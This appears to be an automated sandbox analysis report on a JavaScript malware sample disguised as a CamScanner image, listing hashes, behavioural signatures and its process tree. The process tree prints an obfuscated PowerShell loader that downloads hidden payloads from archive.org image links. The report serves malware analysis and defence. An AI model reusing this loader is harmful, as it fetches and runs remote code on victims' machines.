Analysis
-
max time kernel
17s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
02-08-2024 12:21
Static task
static1
Behavioral task
behavioral1
Sample
CamScanner.jpg.js
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
CamScanner.jpg.js
Resource
win10v2004-20240730-en
General
-
Target
CamScanner.jpg.js
-
Size
337KB
-
MD5
03075353ad7a408cdadc3a28afaf47c0
-
SHA1
31af045eaf01e0006a62f3fa2ae6a0244ad1a37c
-
SHA256
9738532e30fdd2a36d900eff8a42aa1aa03c9cd328d27da75997976bff647401
-
SHA512
0d197c5798a8a7d04583f7d3bfe1fb4e67e546aaf89d0da879c79d5b4735d6a0af766b3da6afd59e894a20a26cfb21dbfb5eb1be6bc063b90c9118bb36c58778
-
SSDEEP
768:ZpUOaxGQG8GQGUD1Chty8vzR+0KFiRIxrAwKwN1Sy1h1l1La138V7DnzBhBLszZI:U2XsQ/Cz+rGS5DUtE1vk
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 2512 powershell.exe 4 2512 powershell.exe 5 2512 powershell.exe 6 2512 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2700 powershell.exe 2512 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2700 powershell.exe 2512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 2512 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2524 wrote to memory of 2700 2524 wscript.exe 29 PID 2524 wrote to memory of 2700 2524 wscript.exe 29 PID 2524 wrote to memory of 2700 2524 wscript.exe 29 PID 2700 wrote to memory of 2512 2700 powershell.exe 31 PID 2700 wrote to memory of 2512 2700 powershell.exe 31 PID 2700 wrote to memory of 2512 2700 powershell.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\CamScanner.jpg.js1⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'ZgB1♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽YwB0♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bwBu♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽R♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽bgBs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽RgBy♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽bQBM♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽YQBt♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽Bb♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽By♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBn♺ ⠰ ℁ ⇝ ⾽Fs♺ ⠰ ℁ ⇝ ⾽XQBd♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽awBz♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽ZQBi♺ ⠰ ℁ ⇝ ⾽EM♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgB0♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽E4♺ ⠰ ℁ ⇝ ⾽ZQB3♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽TwBi♺ ⠰ ℁ ⇝ ⾽Go♺ ⠰ ℁ ⇝ ⾽ZQBj♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽BT♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽E4♺ ⠰ ℁ ⇝ ⾽ZQB0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽VwBl♺ ⠰ ℁ ⇝ ⾽GI♺ ⠰ ℁ ⇝ ⾽QwBs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽Ow♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽bgBs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BE♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽E♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽B1♺ ⠰ ℁ ⇝ ⾽GY♺ ⠰ ℁ ⇝ ⾽ZgBs♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BM♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B8♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽RwBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽LQBS♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽bQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽QwBv♺ ⠰ ℁ ⇝ ⾽HU♺ ⠰ ℁ ⇝ ⾽bgB0♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽LgBM♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBn♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽ZgBv♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽ZQBh♺ ⠰ ℁ ⇝ ⾽GM♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽aQBu♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽Gg♺ ⠰ ℁ ⇝ ⾽dQBm♺ ⠰ ℁ ⇝ ⾽GY♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽T♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽awBz♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽By♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽dwBu♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽bwBh♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQBk♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽r♺ ⠰ ℁ ⇝ ⾽D0♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽ZQBi♺ ⠰ ℁ ⇝ ⾽EM♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgB0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽R♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽bgBs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽aQBu♺ ⠰ ℁ ⇝ ⾽Gs♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽H0♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽Bj♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bj♺ ⠰ ℁ ⇝ ⾽Gg♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽YwBv♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽dQBl♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽fQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽H0♺ ⠰ ℁ ⇝ ⾽Ow♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽ZQB0♺ ⠰ ℁ ⇝ ⾽HU♺ ⠰ ℁ ⇝ ⾽cgBu♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽dwBu♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽bwBh♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQBk♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B9♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽aQBu♺ ⠰ ℁ ⇝ ⾽Gs♺ ⠰ ℁ ⇝ ⾽cw♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽D0♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽JwBo♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bw♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽Og♺ ⠰ ℁ ⇝ ⾽v♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽GM♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽HY♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽cgBn♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽bgBs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽bgBh♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQB2♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽v♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽dgBl♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽LgBq♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Cw♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Gg♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽cw♺ ⠰ ℁ ⇝ ⾽6♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽LwBh♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽YwBo♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽dgBl♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽bwBy♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽LwBk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽dwBu♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽bwBh♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽LwBu♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽HY♺ ⠰ ℁ ⇝ ⾽ZQBl♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽bgBh♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQB2♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽Go♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽Bn♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YQBn♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽QgB5♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽ZQBz♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽bwB3♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BE♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽EY♺ ⠰ ℁ ⇝ ⾽cgBv♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽T♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽awBz♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽Ow♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽Zg♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YQBn♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽QgB5♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽ZQBz♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽LQBu♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽dQBs♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Hs♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bQBh♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽ZQBU♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Fs♺ ⠰ ℁ ⇝ ⾽UwB5♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽LgBU♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽RQBu♺ ⠰ ℁ ⇝ ⾽GM♺ ⠰ ℁ ⇝ ⾽bwBk♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBn♺ ⠰ ℁ ⇝ ⾽F0♺ ⠰ ℁ ⇝ ⾽Og♺ ⠰ ℁ ⇝ ⾽6♺ ⠰ ℁ ⇝ ⾽FU♺ ⠰ ℁ ⇝ ⾽V♺ ⠰ ℁ ⇝ ⾽BG♺ ⠰ ℁ ⇝ ⾽Dg♺ ⠰ ℁ ⇝ ⾽LgBH♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽BT♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽cgBp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽aQBt♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽ZwBl♺ ⠰ ℁ ⇝ ⾽EI♺ ⠰ ℁ ⇝ ⾽eQB0♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽cw♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽BG♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽YQBn♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽P♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽8♺ ⠰ ℁ ⇝ ⾽EI♺ ⠰ ℁ ⇝ ⾽QQBT♺ ⠰ ℁ ⇝ ⾽EU♺ ⠰ ℁ ⇝ ⾽Ng♺ ⠰ ℁ ⇝ ⾽0♺ ⠰ ℁ ⇝ ⾽F8♺ ⠰ ℁ ⇝ ⾽UwBU♺ ⠰ ℁ ⇝ ⾽EE♺ ⠰ ℁ ⇝ ⾽UgBU♺ ⠰ ℁ ⇝ ⾽D4♺ ⠰ ℁ ⇝ ⾽Pg♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽EY♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽8♺ ⠰ ℁ ⇝ ⾽Dw♺ ⠰ ℁ ⇝ ⾽QgBB♺ ⠰ ℁ ⇝ ⾽FM♺ ⠰ ℁ ⇝ ⾽RQ♺ ⠰ ℁ ⇝ ⾽2♺ ⠰ ℁ ⇝ ⾽DQ♺ ⠰ ℁ ⇝ ⾽XwBF♺ ⠰ ℁ ⇝ ⾽E4♺ ⠰ ℁ ⇝ ⾽R♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽+♺ ⠰ ℁ ⇝ ⾽D4♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ 